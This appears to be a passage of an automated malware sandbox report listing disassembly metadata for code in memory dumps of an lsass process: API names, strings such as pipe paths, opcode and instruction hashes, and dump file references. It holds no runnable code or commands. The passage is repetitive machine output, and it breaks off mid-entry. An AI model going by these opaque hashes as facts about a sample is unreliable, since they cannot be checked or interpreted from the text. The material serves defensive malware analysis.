                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: e2b0fc35fde1784bee44412e6aa0ab7fc65bca9c338fcce3b87b088b7d59a9e4
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: 59111727205B80D6FB249B21E88CB1E63A1AB48B45F060827DB9E46766EF3EC55C8700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: 524019c9c190f4085ef242774ac6f67ce51e0351dd4b4719c5f329e12e39d64b
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 2CF0A763308B80D1FB109B13B98C15DA224EB58FD0F098133DF9A0BB2ACE3DC4998300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 8091200d2c4dae040897235056f41ec68d4ed09c36f7d4f29a797052f8d23726
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: DFF05863325B40C2FF459F60E8CC3AC2360AB98B80F4A141B975B86262CF3AC49CC300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: a272b08cb90abcf02a2fc86bcceb2c100b51d762f3ed6657aeb5cb6e22d7e5ba
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: 5E02B732219BC4C6EB608B59F49835EB7A1F385794F114117EBDE87BAADB78C458CB00
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00000202C0AF09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000202C0AF093F,?,?,?,00000202C0AEE263), ref: 00000202C0AF0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000202C0AF093F,?,?,?,00000202C0AEE263), ref: 00000202C0AF0B0A
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: d1872c561c705f38e9229c3beeaaf80fd6878b7c1775d027ea7d44530a41b64b
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: 3581DF33610751C9FB60AB6688CCBAD67A1F344B98F464217DF4A67793DB36884AC710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: d0846778c9f8455aee169a2047bb21eb6bacd067c0f715569a147f0904d3a7df
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: 8A61B736518B84C6FA609B15F49C31E77A1F388784F114217EBDE87BAADB78C558CB04
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 4d152d9eb979de7358603b4530df522b93ab3919d7d759988337ce92c9f54e9e
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 3211E5B6B50F10C1FB6C1228E6DE3AD10406B97F78F5B0627EB77073D79A1A894D9200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 6188f325b3ff6b650061d398d5b13b7a07f1c032209b097b93437b946017f880
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 26113023A54B0182F7682629E5EF36D55406B55374F1A4637AF761B7E78E2A8C8BC300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 236923577d5aa15d6a4631904870ee2daaea5dc695f84c81897f3291c1047b0a
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 8A112A27708780D2FB249B25E48C66D6260F788F94F050027DF9D47795EE3EC55C8700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 2ae334772e38c68e7382a6be4194bc35f8502ba406b3a2429c7b105d830b93b4
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 82114227308781E1FB209735E89D39E53A0F794740F5640239FA983796EF29C92DCB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: 3b65aacb3217f76a4f1f48ad1aa66b7197232698b528f185b9e9419ea648dc4a
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 85012533605B90C6EB44DFA6A88C15D67A0F788F80F0A4526EB9A4372ADF38C0598744
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: bfa7b9923ac52f3c8539521844de462a00e263f76baf048c72ac69bf02513b50
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: F561A132604784C2FEA99B19A1DC3AD6BE4F741784F174567DB0A1B7A3EB79C88D8301
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: 2f4c2c8d9dd4a6012bdb5abda99d943372c89785e9b581c845ab5935f0465f97
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: B0519E222087C1C1F6749E25A6EC3AE6761F395780F460027DFE903B9ADA7DC52C9B50
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: b8b524b5fe783d67d5983f375c2dc6a45dc5e905a3e8289228bac1d50de3bbab
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: 33418F33215B44C5EB609F26E88C7AE67A1F798794F424027EF4E87799DB39C449CB80
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 59099710c9d0f1b4dd14af3ece67d82f0715fec4563d1d43b27d9008531ad6ec
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 90110836608BC0C6EB60CB16B48829AB7A5F7C9B84F544127EFDD83B5ACF38C4548B04
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: a8f766778e052431c9a5ee78e48b909219ac05c3f8b6ede592f7d048be5d9e85
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 9D11FB32618B80C2EB218F15E48825DB7A5F788B94F194222EF9D07765DF39C5558704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: c53597e9f4568b1c293677c340c8b83d66163b3803097d7e19397ed64a21cc46
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: 5FF08227308B80C2FB049B51F4CC69D3260AB48B90F465127EB9917B96CF39C45DC704
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00000202C0AED751
                                                        • TlsSetValue.KERNEL32(?,?,?,00000202C0AEB50E,?,?,?,00000202C0AEB969,?,?,?,?,00000202C0AEBA1D), ref: 00000202C0AED768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 5dcba3befec19a3cabe185201543e8944ea2019330c246110f2bf2d11dbd80ca
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 4CE06D63604740D2FB444B60F8CC2EC3262AB88780F5A8127EB650A2D6DF39C85DC204
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 2e20f8dc9fcf14b6a4866c56fb94d75584ad51f9c336a833ae30503458a3a020
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: 5D11A322605B90C1EF158B66944C15DA7A0FBC8FA0F5A4316DFA993795EF38C056C340
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: bf404a17543ca586d83c88378db0c96524e570c7edb6a69ba4fade01f97d1998
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: EBE03933602700C6FB448B62D84C34937E1EB88B05F0681268A0907351DF7E849D8740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 873c895c39330efbd9b5372d86ee0aee996f3dd3da2caae253372b61916a57b1
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
